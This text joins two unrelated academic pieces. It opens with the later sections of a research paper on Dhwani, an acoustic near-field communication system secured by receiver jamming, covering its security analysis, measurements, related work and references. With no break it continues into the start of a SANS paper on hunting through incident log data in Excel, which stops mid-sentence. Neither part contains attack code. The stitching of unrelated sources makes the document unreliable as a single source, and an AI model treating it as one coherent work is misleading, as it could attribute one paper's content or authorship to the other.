power, making sure that even the eavesdropper is unable to decode
the packet successfully.
8. SECURITY ANALYSIS
In general, there are two approaches to achieving secure commu-
nication: information-theoretic andcryptographic . The information-
theoretic approach is based on Shannon’s information theory (as
we elaborate on in this section), while the cryptographic approach
(e.g., RSA) relies on the computational hardness of problems such
as prime factorization. Our approach to security in Dhwani is infor-
mation theoretic but in no way precludes the use of cryptographic
techniques, which can always be implemented over and above Dhwani.
3Note thatPxmit is really the sender’s power received at the jam-
mer.8.1 Information-Theoretic Security in Dhwani
The classical information-theoretic approach to security is Shan-
non’s one-time pad (OTP) encryption [20]. Suppose device A needs
to communicate a message Mto device B securely in the presence
of an eavesdropper E who can see all messages. Then, A and B first
share a secret random string ω, of length equal to that of M, over
an independent channel not accessible to E. This, ω, is one-time
pad, i.e. it can be only used once and cannot be reused for any sub-
sequent message. A then transmits the message M′=M⊕ωto B.
Knowingω, B can extract MfromM′. This approach is provably
guaranteed to be secure.
Wyner’s wiretap model. Given the obvious difficulties in Shan-
non’s approach of setting up a shared secret between A and B, over
an alternate channel, for every message, Wyner’s wiretap model [21]
takes a different approach, depicted in Figure 12. In this model, A
and B communicate over a channel ChABthat is less noisy than
the channel ChAEvia which E eavesdrops. The key proven re-
sult in the Wyner’s wire-tap model is that, if ChAEis even slightly
more noisy than ChAB, there exists an error correcting mechanism
(e.g., error correcting codes) that A can use over ChABthat will
appear identical to noise for E but can be perfectly decoded at B.
The channel that E listens on is called a Wyner’s wiretap channel .
Dhwani’s approach. Dhwani’s approach falls primarily under the
purview of Wyner’s wiretap model, since the channel to the eaves-
dropper is noisier than that of the intended receiver due to jam-
ming coupled with self-interference-cancellation. Consequently,
the transmitter can use an error correcting mechanism (e.g., er-
ror correcting codes) that is sufficient for correcting errors in the
less noisy channel, ChAB, but not so for the more noisy channel,
ChAE, for the eavesdropper.
Further, since the jamming sequence is generated pseudo-randomly
for each transaction and never reused, it can be viewed as a random
string for one-time-pad encryption4. However, unlike Shannon’s
OTP, Dhwani does not apply the OTP encryption at the transmitter
itself and may be vulnerable to certain attacks such as those based
on shielding and directional antennas, which undermine the Wyner
wiretap assumption.
8.2 Security Attacks on Dhwani
As noted in Section 3.1, Dhwani seeks to defend against both
passive and active attacks on a pair of proximate, communicating
nodes, which are assumed to be trustworthy. In this section, we
discuss various security attacks on Dhwani, assuming that node A
intends to transmit a message Msecurely to B, while C is a mali-
cious node.
Man-in-the-middle and replay attacks. When A transmits Mto
B, a co-located eavesdropper E can receive it and try to transmit a
4While Shannon’s OTP encryption and Wyner’s wire-tap model
analyse the security of binary channels, these results hold even for
analogue signals since they can be translated into corresponding
binary message through demodulation.
051015202530354045500102030405060708090100
Distance [cm]Packet Success Rate [%]
  
No Jamming BPSK
No Jamming QPSK
Jamming BPSK
Jamming QPSKFigure 13: Communication Range of Dhwani
BaseLine L1−L1 L1−L2 L1−L30102030405060708090100Packet Success Rate
  
BPSK
QPSKFigure 14: Packet Success Rates of Dhwani at
various locations
1 2 3 4 5024681012141618202224
  
Mixing Factor [K]SIC [dB]L1−L1
L1−L2
L1−L3Figure 15: SIC achieved in JamSecure for in-
creasing values of K
modified (or unmodified) version to someone else, pretending to be
A. However, since E has no way of receiving any meaningful data,
given the jamming from B, these attacks will remain ineffective.
DOS attacks A co-located device E could transmit its own jam-
ming signal, to disallow meaningful communication between A and
B. While E may succeed in disrupting communication between A
and B, there will be no loss of security since E cannot recover the
data transmitted by A.
Placement attacks. This attack is based on the presumption that
there might be vantage points where B’s jamming is not as effective
and so E could recover A’s transmission. Consider three devices a
sender A, a receiver B and an eavesdropper E located as depicted
in Figure 18. Suppose that the distance between A and B is dand
that between A and E is D. The received acoustic power typically
decays with distance xasx−γ, whereγ > 2. The SNR at the
eavesdropper is thus given by,
SNR =S
J[D2+d2−2Ddcosθ
D2]γ
2
(8)
whereJis the jammer’s power and S the sender’s power at a unit
distance. From Eqn 8 is is clear that SNR decreases monotoni-
cally with increasing D for any given θand in fact the maximum
SNR occurs at D= 0 . Thus, the most advantageous position
for the eavesdropper is to be co-located with the sender. As de-
scribed in Section 7, the sender transmits only upon ensuring there
is enough jamming to ensure that it cannot decode its own trans-
mission. Since no eavesdropper can enjoy at better SNR than the
sender, it follows that an eavesdropper cannot decode the message
either.
In the above argument, we do not consider the effects of multi-
path and near-field acoustic power decay. For instance, in theory,
it is possible that at certain locations, the jamming signals arriving
along multiple paths may all interfere destructively. At such loca-
tions, the eavesdropper might enjoy an SNR high enough to enable
decoding. While it is hard to claim that such scenarios will never
occur, in our tests we could not find any such vantage points, as
discussed in Section 9.5.
Stopping Attacks. This attack arises specifically because of Dhwani’s
reliance on the receiver, B, to jam A’s transmission. If B were
somehow disabled, then E could receive Min the clear. In fact,
as it disables B, E can start emitting its own jamming signal, to
keep A in the dark about B’s disablement. However, as discussed
in Section 3.1, in Dhwani’s security model, a deliberate attack by
E to disable B is not within scope. However, if B were to fail ac-
cidentally (e.g., lose power), A would detect that the jamming has
ceased and stop transmitting immediately, as noted in Section 7.
Directional reception and shielding attacks. In these attacks, Euses a highly directional microphone (say using an microphone ar-
ray formed by a coordinated set of attacker nodes) that is aimed
at the speaker of A to boost the signal from A relative to the jam-
ming noise from B, or alternatively, uses physical shielding aimed
at B to reduce its jamming noise relative to the signal from A. The
net effect in either case is an improvement in the signal-to-noise
ratio, increasing E’s chances of decoding A’s transmission despite
the jamming by B. While such attacks are possible in theory, these
would be extremely difficult to mount in practice because of the
close proximity of A and B, with the typical separation between
them being a few cm. For example, the attacker has to be able
to focus the directional microphone (or beamform) into a narrow
region of only a few cm in order to selectively avoid the jammer.
Also, since sound travels freely around obstacles, it is not feasible
to selectively shield the jamming noise emanating from B, short
of placing the shield right next to B (cloaking B’s speaker), which
again is hard to do undetected.
9. RESULTS
In this section, we present an evaluation of Dhwani and quantify
several performance aspects such as its range, efficacy of self inter-
ference cancellation, and achieved packet success rates for different
modulation schemes.
9.1 Operating Range of Dhwani
For Dhwani to be suitable for NFC, the ability to communicate
must be limited to a very small range. As discussed in Section 3,
each transmitter was pre-configured based on measurements to be
limited to a range of 10cm. In these experiments, we evaluate
how sharply the drop off in the communication range of Dhwani
is. To answer this, we measured the Packet Success Rate (PSR) for
Dhwani by transmitting 100 packets between a Samsung Galaxy
S2 and a HP mini, at each of several different distances separating
the devices. Figure 13 shows the PSR as a function of distance,
with and without jamming, for two different modulations BPSK
and QPSK. The best case SIC was used in the case with jamming
(see Section 9.2 below). As seen from Figure 13, the PSR sharply
falls to 0 at a distance of about 20cm, even in the absence of any
jamming. So the communication range is indeed small.
Location L1 L2 L3 L4
L1 (small room) 22.3 6.9 7.2 6.7
L2 (large room) 7.3 18.3 7.4 7.9
L3 (open pantry) 7.2 6.5 24.1 9.5
L4 (cafeteria) 7.4 8.7 8.3 12.9
Table 1: SIC (in dB) obtained at various locations.
9.2 Effectiveness of SIC
In this experiment we evaluate the effectiveness of Dhwani’s
SIC. As described in Section 6, Dhwani generates PN sequences
during training and uses the recorded versions of these sequences
to perform SIC. If the devices are trained at one “training” loca-
tion and then taken to another “test” location, while the channel
characteristics of the speaker and microphone do not change, the
multi-path environment may change. To evaluate the impact of
this change, we tested Dhwani in four different locations – a small
room, a large room, an open pantry area and a cafeteria, which we
shall refer to as L1, L2, L3, and L4, respectively. At each of the
locations, Dhwani was trained by generating a library of PN se-
quences, and then tested by performing SIC at all other locations.
In Table 1 the value of ithrow andjthcolumn is the amount
of SIC obtained when the PN sequence was generated at Liwas
used to cancel at location Lj, the results being averaged over 10
trials. As seen from Table 1, the cancellation is close to 20dB (i.e.,
only1
100of the jamming signal remains) whenever the testing and
training locations are the same. This is what we expect to be the
case when the receiver is a fixed installation, such as a POS termi-
nal. Further, unsurprisingly, when the training and test locations are
non-matching, the effectiveness of SIC degenerates to 6-7dB. This
quick degeneration of SIC performance with even a limited amount
of multipath shows drop from 20 to 6-7 indicates that even though
multi-path is not the significant reason for frequency selectivity of
the acoustic channel it does have significant impact on SIC. How-
ever, per the discussion in Section 3.5, even this reduced amount of
SIC is sufficient for secure communication.
9.3 Impact of Jamming on Packet Success Rate
To evaluate the impact of jamming, we measured packet suc-
cess rates for 256-bit packets at various locations with SIC based
on the recorded PN sequences from various locations. Figure 14
depicts the packet success rates when the initial configuration was
performed at L1 and Dhwani was tested at locations L1-L3. The
packet success rate is measured by transmitting 100 packets and
counting the number of packets whose CRC did not fail. In order
to establish a baseline, we first measured the PSR without any jam-
ming, which is referred to as the Baseline in Figure 14. As seen
from the figure, in the absence of jamming, for BPSK modulation,
the packet success rate is 100% while it is about 95% for QPSK
modulation. In the presence of jamming and SIC with the con-
figuration and testing locations both being L1, BPSK still gives a
100% packet success rate while it reduces to about 80% for QPSK.
When Dhwani is tested at other locations, the PSR is around 90%
for BPSK and 60-70% for QPSK. Note that in the event of a packet
loss, retransmissions can be used to recover the packet. However,
our current implementation does not have any retransmissions. A
key result in all these experiments was that in the presence of jam-
ming, zero out of 100 packets were received successfully at each of
the locations when we did not apply any SIC (as would be the situ-
ation of the eavesdropper). This corresponds to the scenario where
the eavesdropper is exactly co-located at the receiver.
9.4 Performance of JamSecure with increas-
ing Mixing Factor
In the previous results we demonstrated the effectiveness of SIC
when jamming was done using a single PN sequence Mixing Fac-
torK= 1 in Eqn 6. As discussed in Section 6, when receivers
are located at fixed installations, an eavesdropper may have the ad-
vantage of time to learn the library of PN sequences. The mixing
factorK > 1can then be used to thwart the eavesdropper from
learning the library since the eavesdropper’s search space increasesexponentially as K. Clearly asKis increased, the performance of
SIC is expected to degrade. This is because, the estimation errors
of each of the constituent PN sequences add up and result in larger
errors.
Figure 15 depicts the SIC achieved by JamSecure for various
values ofK— when the training and testing locations were the
same (L1) and when the training and testing locations were differ-
ent (trained in L1 and tested in L2,L3). As seen from Figure 15,
when the training and testing locations are the same, as expected
SIC does degenerate as Kas it increases from 1 to 5, however,
even atK= 5 the SIC is as high as 10dB. When training and
testing locations are different (L1-L2 and L1-L3) the achieved SIC
only decreases slightly as Kincreased from 1 to 5 and is typically
between (6-7dB). Figure 16 depicts the Packet Success Rate (PSR)
corresponding to the scenarios in Figure 15 for BPSK modulation.
As depicted in Figure 16 the PSR is almost 100% when the receiver
is trained and tested in the same location and over 90% for values
ofKbetween 1 and 5.
9.5 Multipath Effects on Jamming
To answer the question of whether there are special vantage points
where jamming is not very effective and so the eavesdropper could
enjoy a high SNR, we conducted experiments using the topology
depicted in Figure 18. We placed an eavesdropper E at various lo-
cations around the sender A, and measured the received SNR in
the presence of jamming from the receiver B. Figure 17 shows the
received SNR at placement locations centred around the sender at
three different distances D=2,5 and 10cm and θat45ointer-
vals. As seen in Figure 17, at all these locations, while there are
variations in SNR, the observed SNR is typically less than 0dB, in-
dicating that there is no vantage point where an eavesdropper may
be placed to achieve successful reception.
10. RELATED WORK
We have presented background and related work in the context
of NFC (Section 2) and SIC (Section 6.1). We now discuss prior
work on phone based acoustic communication and physical-layer
security.
10.1 Acoustic Communication
[17] provides an extensive review of acoustic communication
as a wireless technology for short and long distance communica-
tion. Existing techniques use On Off Keying (OOK) modulation
and achieve up to 270bps at short distance of under 30cm. Our cur-
rent implementation of Dhwani uses OFDM and achieves 5x these
data rates.
Wimbeep [1] and Zoosh [2] offer acoustic communication sys-
tems targeting location-based advertising and mobile payments. While
the technical details of these start-up offerings are not available, the
description of Zoosh at [8] indicates that it operates in the ultrasonic
band (beyond 20 KHz), offers a low bit rate of 300 bps (presumably
because of the poor speaker and microphone characteristics beyond
20 KHz), and limits the communication range to 15cm to provide
security. We believe that security based on range-limitation alone is
inherently risky since the eavesdropper could use an ultra-sensitive
microphone to boost the effective reception range. Hence Dhwani’s
emphasis on information-theoretic security at the physical layer.
10.2 Physical-Layer Security
The related work closest to Dhwani is IMDShield [12], which
aims to secure communication to and from implantable medical
devices (IMDs). IMDs are not amenable to using cryptographic
1 2 3 4 50102030405060708090100
  
Mixing Factor [K]Packet Success Rate [%]L1−L1
L1−L2
L1−L3Figure 16: Packet Success Rate With Increasing
Mixing Factor for BPSK modulation
045 90135 180 225 270 315 360−10−8−6−4−202
θ [degrees]SNR [dB]
  
D=2cm
D=5cm
D=10cmFigure 17: SNR for the eavesdropper at various
locations around the sender
Figure 18: Placement attack analysis
techniques due to limited device memory and the need for im-
mediate access in critical scenarios. IMDShield is a base-station
that attempts to provide secure communication to and from the
IMDs without requiring any alteration to the devices themselves.
IMDShield continuously listens to IMD transmissions and trans-
mits a jamming signal to secure it from eavesdroppers. Similar to
Dhwani, the IMD base-station can perform self-interference can-
cellation and extract the message transmitted from the IMD. It then
relays this message securely to the intended receiver using suitable
encryption mechanisms. Similarly, in order to disallow malicious
devices from reprogramming the IMD, the IMDSheild upon detect-
ing a spurious transmission actively jams it and prevents the IMD
from being programmed. Dhwani’s novelty compared this work
lies in (a) it being a software-only solution with no additional hard-
ware, and (b) the JamSecure technique, which uses a pre-computed
library based approach to jamming and SIC (Sec 6.2).
In Radio Telepathy [19], the authors propose a scheme where
every pair of nodes can agree on a cryptographic key without ac-
tually performing a key exchange. The key idea is that since the
wireless channel between a pair of nodes is symmetric, a common
key can be extracted independently at each node from the channel
response characteristics from a single transmission. In [15], the
authors explore the practical limitations of extracting viable cryp-
tographic keys using channel response information. In [18] the au-
thors propose attack cancellation – a technique where sensor nodes
in a sensor network collaboratively jam fake transmissions to de-
fend against battery depletion attacks.
11. CONCLUSION
In this paper, we have presented Dhwani, a software-only acous-
tic NFC system that is accessible to the large base of existing mo-
bile devices. The design of Dhwani is informed by our character-
ization of acoustic hardware and environment, and includes sev-
eral novel elements. Chief among these is the receiver-based, self-
jamming technique called JamSecure, which provides information-
theoretic, physical-layer security. Our experimental evaluation point
to the suitability of Dhwani for secure NFC communication.
Acknowledgements
We thank the anonymous reviewers and our shepherd, Shyamnath
Gollakota, for their feedback.
12. REFERENCES
[1] Wimbeep. https://sites.google.com/site/wimbeep/.
[2] Zoosh. http://www.naratte.com/.
[3] Advanced Encryption Standard (AES), Nov 2001. U.S. Federal
Information Processing Standard Publication 197,
http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf.[4] Near Field Communication Interface and Protocol (NFCIP-1), Dec
2004. ECMA-340 Standard (2nd Edition), http://www.ecma-
international.org/publications/standards/Ecma-340.htm.
[5] NFC-SEC Whitepaper, Dec 2008. http://www.ecma-
international.org/activities/Communications/tc47-2008-089.pdf.
[6] NFC-SEC-01: NFC-SEC Cryptography Standard using ECDH and
AES, Jun 2010. ECMA-386 Standard (2nd Edition),
http://www.ecma-international.org/publications/standards/Ecma-
386.htm.
[7] NFC-SEC: NFCIP-1 Security Services and Protocol, Jun 2010.
ECMA-385 Standard (2nd Edition), http://www.ecma-
international.org/publications/standards/Ecma-385.htm.
[8] Start-Up Naratte Launches Novel Ultrasonic Near-Field
Communications Solution, Jul 2011.
http://www.bdti.com/InsideDSP/2011/07/28/Naratte.
[9] 86% of POS terminals in North America will accept NFC payments
by 2017, Jun 2012.
http://www.nfcworld.com/2012/06/07/316112/berg-86-percent-of-
pos-terminals-in-north-america-will-accept-nfc-payments-by-2017/.
[10] At Villanova University, NFC Technology Being Tested, Mar 2012.
http://www.todaysfacilitymanager.com/2012/03/at-villanova-
university-nfc-technology-being-tested.
[11] NFC specialist Tapit to raise US$8m for international expansion, Jul
2012. http://www.nfcworld.com/2012/07/26/317057/nfc-specialist-
tapit-to-raise-us8m-for-international-expansion/.
[12] S. Gollakota, H. Hassanieh, B. Ransford, D. Katabi, and K. Fu. They
Can Hear Your Heartbeats: Non-Invasive Security for Implanted
Medical Devices. In SIGCOMM , 2011.
[13] E. Haselsteiner and K. Breitfuss. Security in Near Field
Communication (NFC). In Workshop on RFID Security , Jul 2006.
[14] M. Jain, J. I. Choi, T. Kim, D. Bharadia, K. Srinivasan, S. Seth,
P. Levis, S. Katti, and P. Sinha. Practical, Real-time, Full Duplex
Wireless. In Mobicom , 2011.
[15] S. Jana, S. Premnath, M. Clark, S. Kasera, N. Patwari, and
S. Krishnamurthy. On the Effectiveness of Secret Key Extraction
from Wireless Signal Strength in Real Environments. In Mobicom ,
2009.
[16] H. Kortvedt and S. Mjolsnes. Eavesdropping Near Field
Communication. In The Norwegian Information Security Conference
(NISK) , Nov 2009.
[17] A. Madhavapeddy, D. Scott, A. Tse, and R. Sharp. Audio
Networking: The Forgotten Wireless Technology. IEEE Pervasive
Computing , 2005.
[18] I. Martinovic, P. Pichota, and J. B. Schmitt. Jamming for Good: A
Fresh Approach to Authentic Communication in WSNs. In WiSec ,
2009.
[19] S. Mathur, N. M, C. Ye, and A. Reznik. Radio-telepathy: extracting a
secret key from an unauthenticated wireless channel. In Mobicom ,
2008.
[20] C. E. Shannon. Communication Theory of Secrecy Systems. Bell
Systems Technical Journal , 28, Oct 1949.
[21] A. Wyner. The Wire-Tap Channel. Bell Systems Technical Journal ,
54, 1974.Interested in learning
more about security?
SANS Institute
InfoSec Reading Room
This paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission.
Hunting through Log Data with Excel
Gathering and analyzing data during an incident can be a long and tedious process. The vast amounts of data
involved in even a single system intrusion can be overwhelming. Larger and well-funded incident response teams
typically have a Security Information and Event Management (SIEM) product at their disposal to help the
responder sift through this data to find artifacts relevant to the intrusion. This paper will demonstrate to
the reader how to use Microsoft Excel and some of its more advanced features during an intru...
Copyright SANS Institute
Author Retains Full RightsAD

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Log Data with Excel  
GIAC GCIH  Gold Certification  
Author: Greg Lalla , greg.lalla@mail.com  
Advisor: Chris topher  Walker , CISSP, GWEB, GCED, CCISO, GCUX, GCWN, GSEC  
Accepted: March 25 , 2017  
Abstract  
Gathering and analyzing data during an incident can be a long and tedious process . The 
vast amounts  of data involved in even a single  system intrusion can be overwhelming. 
Larger and well -funded incident response teams ty pically have a Security Information 
and Event M anagement (SIEM ) product at their disposal to help the responder sift 
through this data to find artifacts  relevant to the intrusion . This paper will demonstrate to 
the reader how to use Microsoft Excel and some of its more advance d features during an 
intrusion if a SIEM or similar product is not available to the incident responder.  
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 2 
Mi
crosoft	Office	UserMicrosoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	1.Introduction
This document  will show  you how to  use Microsoft Excel to search through 
dissimilar  data to find significant  artifacts needed to respond to an intrusion . It may not 
be ideal to  import  thousands of lo g entries into Excel and root  through them for a few 
nuggets that might  give you insight into the adversary’s exploitation of a network. 
However, if a SIEM  product  is not running in the enterprise , with a little knowledge and a 
small amount of coding, you can use Excel as a suitable substitute. There will still be a 
manual effort involved as there is no magic button that will produce all the artifacts that 
you wish to find, but the process described here will make it easier and more intuitive to 
filter out all the unwanted data.  
When examining logs, you will look  for indicators of compromise  (IOCs)  that can 
point you in the direc tion of other compromised systems. The examination of logs  is not a 
deep dive forensi c type of analysis . During an incident, there is not enough time to look 
at every log entry from every syst em. The method shown below  will help find the 
obvious artifacts and identify the next system to examine.   
This guide will contain up to three  methods f or each example presented. First, the 
paper will show some of  the things you can do with Excel by just us ing the toolbar 
commands. Second, if available, an Excel Function will be created to show how it can be  
slightly  automated. Third,  to enhance the Excel Function process even further, Visual 
Basic for Applications (VBA) code will be provided . Knowing alt ernate ways of 
manipulating different types of data will allow you to incorporate th e results into the 
standard output described below.   
To prevent this paper from being overly long and difficult to search through, the 
VBA code will be made available on  the GitHub  website to make it easier to replicate. 
The GitHub  URL is  https://git hub.com/gregory -lalla/GCIH_Gold /. 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3 
	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	2. Requirements  
2.1. Excel Version  
The Excel Functions and VBA code in this paper were written and executed using 
Microsoft Excel 2010. Other versions of Microsoft Excel based on the Office Open XML 
(OOXML) specification  (Excel 2007 and later) should have most of the same 
functionality. There are exceptions, such as  “Making a Macro that changes the cell colors 
and mak ing changes to other aspects of cells may not be backward compatible” 
(“Microsoft Excel”, 2016).  Also, t he location of some options may be in different menus 
or locations within a menu.  
2.2. Developer Toolbar  
To use the techniques described in this document, y ou will need to have the 
Developer Toolbar added to the Ribbon. For instructions  on how to enable the Developer 
Toolbar , visit https://msdn.microsoft .com/en -us/library/bb608625.aspx/.  
3. Organization al Concepts  
Formatting , filtering , and organization are the core technique s in this paper for 
finding  relevant information needed to respond to an incident. The following are 
suggestions on how to get Excel to displa y the data in a way that is easy  to analyze.  We 
will use these  techniques when looking at each of th e different types of logs discussed 
later in this paper.  
3.1. System Time  
First, depending on the geographic location of your systems, the time zone 
settings may need to be adjusted. If the location of all the system s is in the same  time 
zone , then you may want to perform all your data correlation in the local time zone. If 
your systems span time zones, it is best to do all the analysis using the Coordinated 
Universal Time (UTC) time zone. Using UTC, all the data will line up chronol ogically. 
To make th e process  easier, the system time should be changed to UTC so that 
application s that use the computer’s time to display the timestamp will automatically 
produce the correct time format.  
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4 
	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	Another setting to change is the Date and Time format of your analysis computer . 
Excel uses the Date/Time  format of the system when it displays the information in the 
formula bar. To keep things consistent throughout the investigation and within reporting, 
have the Date/Time  in the ‘mm/dd/yyyy hh:mm:ss ’ format  (with out the quotes) . This 
setting makes all the date and time values  19 characters long . To make this change, 
follow these instructions: https://support.office.com/en -us/article/Change -the-Windows -
regional -settings -to-modify -the-appearance -of-some -data-types -edf41006 -f6e2-4360 -
bc1b -30e9e8a54989 /. 
Finally, the dates and times in the Excel spreadsheets need to be formatted to 
display the same ‘mm/dd/yyyy hh:mm:ss ’ format . In the below example, you change the 
Date/Time  format by select ing Column A  which contains the date and time values , then 
right click ing the column and select ing ‘Format Cells...’. This process should bring up a 
new window titled ‘Format Cells’ with the ‘Number’ tab already selected. Under 
‘Category ,’ click ‘Custom .’ In dialogue bo x labeled ‘Type:’  enter mm/dd/yyyy hh:mm:ss 
(Figure 1). 
 
Figure	 1.	Date	Format	(Lee,	2014,	digital	case	files) 	
3.2. Consistent Results  
Other columns displaying data should also have a uniform appearance, which 
makes it easier to spot t rends, inconsistencies, patterns, etc. In this paper, the following 
column headers will be used across all spreadsheets to achieve that consistent  look:  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5 
	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	• Column A Header Name = Date/Time  
• Column B Header Name = Account  
• Column C Header Name = Computer  
• Column D Header Name = Description  
• Column E Header Name = Details  
• Column F Header Name = Properties  
• Column G Header Name = Miscellaneous  
• Column H Header Name = Artifact  
 
Note that it is acceptable to have  empty columns to the spreadsheet if there is not 
enough data to fill all the suggested  columns.  
3.3. Formatting  
To easily read the data , you will freeze the top row and apply a bold font to it;  
enable filters on the  columns ; set the column widths to ‘Autofit ’; and ‘left justify’ the 
entire  spreadsheet . Reduce the data where possible and  sort it  by the Date/Time column 
from oldest to newest . Please see the GitHub  page which has a n Excel template of the 
standard f ormat named ‘Standard_Format.xltm ’ (https://github .com/gregory -
lalla/ GCIH_Gold/blob/master /Docs/Template/Standard_Format.xltm ). 
3.4. Keywords , Named Cells , and Filters  
One of  the common themes repeated in this paper is data reduction. Excel can 
handle a lot of data, but there is a cost in the time it ta kes to manipulate and analyze  that 
data.  Each log file  examined will have unique entries which the responder must 
understand to reduce the d ata without losing critical items  relevant to the incident.  
One method of data reduction is the use of keywords. A list of keywords will be 
used to help pinpoint known or suspicious activity related to the intrusion. There should 
be two types of keyword lists maintained. One master list of all the terms discovered 
during the throughout the investigation and an event list for each type of log analyzed . 
Tailor the  event keyword lists to the log file s you are inspecting  to minimize the out put of 
the filtered data.  
When reducing  data, one issue faced is the location of the data you want to keep 
changes as rows and columns get adjus ted. This shifting of data needs to be kept in mind 
when working with ‘Named Cells ’ (Blue arrow in Figure 2) as the properties assigned to 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6 
	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	the cell stay with that cell, even if the data in the cell moves to a new location. Therefore, 
reduce and adjust all the data before using  ‘Named Cells .’ If the data in a ‘Named Cell’ 
will change , a good  way to keep track of that data  is to use  ‘Fill Colors .’ When a keyword 
search gets a match, highlight the cell or entire row with a particular  color. Using filters, 
you can locate the ‘colored’  data with a few clicks of the mouse .  
To manually work with keywords, the basic search feature can be used to find 
each instance of the keyword. Enter a unique identifier in the cell ‘Name Box ’ (Blue 
arrow in Figure 2) when a keywo rd is found in a cell . The unique identifier name has the 
following rules:  “The first character of a name must be a letter, an underscore character 
(_), or a backslash ( \). Remaining characters in the name can be letters, numbers, periods, 
and underscore c haracters ” (“Define and use names in formulas – Excel”, 2017).  
 
Figure	 2.	Named	Cell.	(Lee,	2014,	digital	case	files) 	
After naming the cell, fill the  entire row that contains the keyword  with a color 
(Figure 3). For each unique keyword found you can continue to use the same color or 
change them t o different  colors distinctively  associated with each keyword . Using the fill 
colors is helpful when using the filter tool, which will be discussed and demonstrated 
further into the paper . 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 7 
	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 3.	Fill	Color.	(Lee,	2014,	digital	case	files) 	
Click ‘Find Next’ in the ‘Find and Replace’ window to find the next instance of 
the keyword. Once found, give that cell a similar, but unique name to distinguish it from 
the first keyword found and give it a ‘Fill Color .’ As an example, the first unique cell 
Name would be ‘Svchost_Evil_1’ and the second would be ‘Svchost_Ev il_2’ for hits 
found on keyword  ‘svchost.exe .’ After all  the keywords are searched and found in this 
manner, you can navigate to those cells by clicking the dropdown arrow in the cell ‘Name 
Box’ and select ing one of the entries (Figure 4). You can also manage the ‘Named  Cells’ 
and see their location by going to the ‘Formulas’ ribbon tab and selecting  the ‘Name 
Manager ’ icon (Figure 5).  
 
Figure	 4.	Selecting	Named	Cells.	(Lee,	2014,	digital	case	files) 		

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 8 
	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 5.	Name	Manager.	(Lee,	2014,	digital	case	files) 	
 Using  ‘Named  Cells’ is a quick way to  locate known  artifacts. It is also an 
excellent way to find more keywords  by examining the data around those cells . 
Filters are another technique to find data and visually reduced the data to only 
show those cells that the analyst wishes to view . These are particularly  helpful when you 
know you’ll have many hits on your keywords and would like to see them without the 
clutter of all the ot her rows not associated with those  keywords. There are two ways to 
use the filters. There is a basic filter where you can have up to two items filtered per 
column using AND OR operators. To filter on more than two items, there are Advanced 
Filters which can be used to search for data  with more complex options .  
We enabled basic filters already in an earlier  example . To access  them, on the 
column we are looking to search, click on the dropdown arrow in the header cell. Select 
the ‘Text Filters’ option and then choose  one of t he filter selections  (See Figure 6). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 9 
	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 6.	Filter	Dropdown	Menu.	(Lee,	20 14,	digital	case	files) 	
When the filter window comes up, enter the word(s) you want to locate (or 
exclude) in the dialogue box . The filter will display only the rows that have  (or don’t 
have)  the words in the colu mn. 
You can also search on the ‘Fill Colors’ used during the keyword search to filter 
only on those colors you wish to see  (Figure 7). 
 
Figure	 7.	Search	on	Fill	Color.	(Lee,	2014,	digital	case	files) 	
The advance d filters allow you to search for more than  two keywords  in a 
column. You enter the  keywords into unused cells in the spreadsheet. The first cell is the 
column header name of the column to search . The cells underneath are the search terms. 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
0 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	Words  listed vertically use the OR operator and those listed horizontall y use the AND 
operator. Figure 8 shows an example of an advanced filter, where you are searching the 
‘Details’ column  for five keywords. Surrounding  the keyword with asterisks  finds cells 
that CONTAIN the word. For details on  filters, see https://support.o ffice.com/en -
us/article/Filter -by-using -advanced -criteria -4c9222fe -8529 -4cd7 -a898 -3f16abdff32b /. 
 
Figure	 8.	Advanced	Filter.	(Lee,	2014,	digital	case	files) 	
Note the timeframe of the filtered keyword data. When looking at all the log files 
with tens of thousands of lines of data, this range will be important when deciding what 
to export for analysis  (if given the option ). The dropdown menu on the Date/Time 
column  is used to filter by timeframe (Figure 9). Selecting the ‘Between ...’ filter will 
allow you to capture all the data between two dates narrowing down what data you need 
to examin e. 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 1
1 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 9.	Search	by	Date/Time.	(Lee,	2014,	digital	case	files) 	
One thing to be aware of when filtering by timeframe is t hat artifacts may have 
